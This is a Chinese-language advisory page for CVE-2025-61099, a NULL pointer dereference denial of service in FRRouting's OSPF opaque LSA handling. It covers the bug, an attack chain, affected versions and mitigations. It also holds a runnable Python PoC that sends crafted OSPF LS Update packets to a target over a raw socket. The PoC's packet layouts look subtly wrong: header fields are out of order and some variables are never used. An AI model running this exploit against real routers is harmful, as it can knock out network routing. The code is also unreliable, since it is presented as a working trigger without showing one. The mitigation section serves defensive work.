CVE-2025-61099 FRRouting ospf_opaque.c NULL指针解引用拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-61099

漏洞类型

NULL指针解引用

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FRRouting/frr

漏洞概述

CVE-2025-61099是FRRouting项目中一个高危安全漏洞，该漏洞存在于FRRouting的OSPF路由协议实现中，具体位于ospf_opaque.c文件的opaque_info_detail函数。FRRouting是一个广泛使用的开源IP路由协议套件，支持OSPF、ripd、bgpd、isisd等多种路由协议，被部署在众多网络设备和服务器上。该漏洞影响范围覆盖FRRouting从v2.0到v10.4.1的所有版本。攻击者可以利用该漏洞通过发送精心构造的LS Update数据包来触发ospf_opaque.c中的NULL指针解引用，从而导致FRRouting服务崩溃，造成拒绝服务(DoS)攻击。由于OSPF是内部网络和运营商网络中广泛使用的核心路由协议，该漏洞可能对网络基础设施造成严重影响。攻击者无需认证即可利用此漏洞，这大大增加了其危害性。CVSS 3.1评分7.5（高危）反映了该漏洞的高可用性影响和无需认证即可利用的特性。

技术细节

该漏洞的根本原因在于ospf_opaque.c文件中的opaque_info_detail函数在处理OSPF Opaque LSA（Link State Advertisements）时未能正确验证指针有效性。OSPF Opaque LSA是OSPF协议的扩展机制，用于携带额外的路由信息或应用程序特定数据。当FRRouting接收到攻击者精心构造的LS Update数据包时，opaque_info_detail函数会尝试访问一个NULL指针，导致程序崩溃。具体攻击过程如下：1) 攻击者向运行FRRouting的目标设备发送包含恶意Opaque LSA的LS Update数据包；2) FRRouting的OSPF模块解析该数据包并调用opaque_info_detail函数；3) 该函数在未进行NULL检查的情况下直接解引用指针；4) 触发SIGSEGV信号导致FRRouting进程终止。由于OSPF协议要求邻居之间周期性交换路由信息，攻击者可以在建立邻居关系后持续发送恶意数据包，或者利用已建立的邻居关系进行攻击。该漏洞属于典型的输入验证不足导致的拒绝服务漏洞。

攻击链分析

STEP 1

信息收集

攻击者识别运行FRRouting且启用OSPF协议的目标设备

STEP 2

邻居建立

攻击者与目标建立OSPF邻居关系或利用已存在的邻居关系

STEP 3

数据包构造

攻击者构造包含恶意Opaque LSA的LS Update数据包，设计用于触发NULL指针解引用

STEP 4

漏洞触发

目标FRRouting接收到恶意数据包后，ospf_opaque.c的opaque_info_detail函数尝试访问NULL指针

STEP 5

服务崩溃

NULL指针解引用导致SIGSEGV信号，FRRouting进程崩溃，路由功能中断

STEP 6

DoS完成

网络路由中断，依赖该设备的网络通信出现故障，需要手动重启服务恢复

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-61099 PoC - FRRouting NULL Pointer Dereference in ospf_opaque.c
This PoC demonstrates sending a crafted OSPF Opaque LSA to trigger NULL pointer dereference.
"""
import socket
import struct
import random

def calculate_ospf_checksum(data):
    """Calculate OSPF checksum"""
    # Simplified checksum calculation
    total = sum(struct.unpack('!' + 'H' * (len(data) // 2), data[:len(data)//2*2]))
    if len(data) % 2:
        total += struct.unpack('!B', data[-1:])[0]
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_crafted_ospf_packet():
    """Build a crafted OSPF LS Update packet with malicious Opaque LSA"""
    
    # OSPF Header
    version = 2  # OSPF v2
    msg_type = 4  # LS Update
    length = 0  # Will be calculated
    router_id = socket.inet_aton('10.0.0.1')
    area_id = socket.inet_aton('0.0.0.0')
    checksum = 0
    autype = 0
    auth = b'\x00' * 8
    
    header = struct.pack('!BBHH4s4sHH', 
                         version, msg_type, length, checksum,
                         router_id, area_id, autype, 0) + auth
    
    # Number of LSAs
    num_lsas = 1
    
    # Crafted Opaque LSA (Type 9/10/11) that triggers NULL pointer dereference
    # LSA Header
    ls_age = 1
    options = 0x22
    ls_type = 9  # Opaque LSA Type 9
    link_state_id = b'\x00\x00\x00\x01'
    advertising_router = socket.inet_aton('192.168.1.1')
    ls_sequence = 0x80000001
    ls_checksum = 0
    length = 64  # LSA length
    
    lsa_header = struct.pack('!HHBB4s4sIiHH',
                             ls_age, ls_checksum, options, ls_type,
                             link_state_id, advertising_router,
                             ls_sequence, 0, length)
    
    # Malicious LSA body designed to trigger NULL dereference
    # This contains crafted data that causes opaque_info_detail to dereference NULL
    lsa_body = b'\x00' * 44  # Padding to cause NULL pointer access
    
    # Opaque TLV with crafted values
    opaque_type = struct.pack('!H', 1)
    opaque_length = struct.pack('!H', 36)
    opaque_value = b'\xFF' * 36
    
    crafted_lsa = lsa_header + opaque_type + opaque_length + opaque_value
    
    return header[:4] + struct.pack('!H', len(header) + 4 + len(crafted_lsa)) + header[6:] + struct.pack('!I', num_lsas) + crafted_lsa

def send_exploit(target_ip, router_id):
    """Send the crafted exploit packet"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_OSPFIGP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    
    # Build packet with proper OSPF header
    packet = build_crafted_ospf_packet()
    
    # Send to target
    sock.sendto(packet, (target_ip, 0))
    print(f"[*] Sent crafted OSPF Opaque LSA packet to {target_ip}")
    print(f"[*] This packet is designed to trigger NULL pointer dereference in opaque_info_detail")
    
    sock.close()

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [source_router_id]")
        sys.exit(1)
    
    target = sys.argv[1]
    router_id = sys.argv[2] if len(sys.argv) > 2 else '10.0.0.1'
    
    send_exploit(target, router_id)

影响范围

FRRouting/frr v2.0

FRRouting/frr v2.1

FRRouting/frr v2.2

FRRouting/frr v2.3

FRRouting/frr v2.4

FRRouting/frr v2.5

FRRouting/frr v2.6

FRRouting/frr v3.0

FRRouting/frr v4.0

FRRouting/frr v5.0

FRRouting/frr v6.0

FRRouting/frr v7.0

FRRouting/frr v7.5

FRRouting/frr v8.0

FRRouting/frr v8.1

FRRouting/frr v8.2

FRRouting/frr v8.3

FRRouting/frr v8.4

FRRouting/frr v8.5

FRRouting/frr v9.0

FRRouting/frr v9.1

FRRouting/frr v10.0

FRRouting/frr v10.1

FRRouting/frr v10.2

FRRouting/frr v10.3

FRRouting/frr v10.4

FRRouting/frr v10.4.1

防御指南

临时缓解措施

如果无法立即升级FRRouting，可采取以下临时缓解措施：1) 在OSPF配置中禁用Opaque LSA功能（no capability opaque）；2) 使用ACL访问控制列表限制OSPF协议端口（OSPF使用IP协议号89），仅允许受信任的路由器IP地址进行OSPF通信；3) 启用OSPF邻居认证（authentication-key或ip ospf message-digest-key）防止攻击者建立邻居关系；4) 在网络设备上部署流量过滤规则，丢弃异常的Opaque LSA数据包；5) 监控FRRouting进程状态，设置自动重启机制以减少服务中断时间；6) 考虑使用iptables或ebtables规则过滤非法的Opaque LSA类型。需要注意的是，这些缓解措施可能会影响OSPF的某些高级功能，应在测试环境中验证后再部署到生产网络。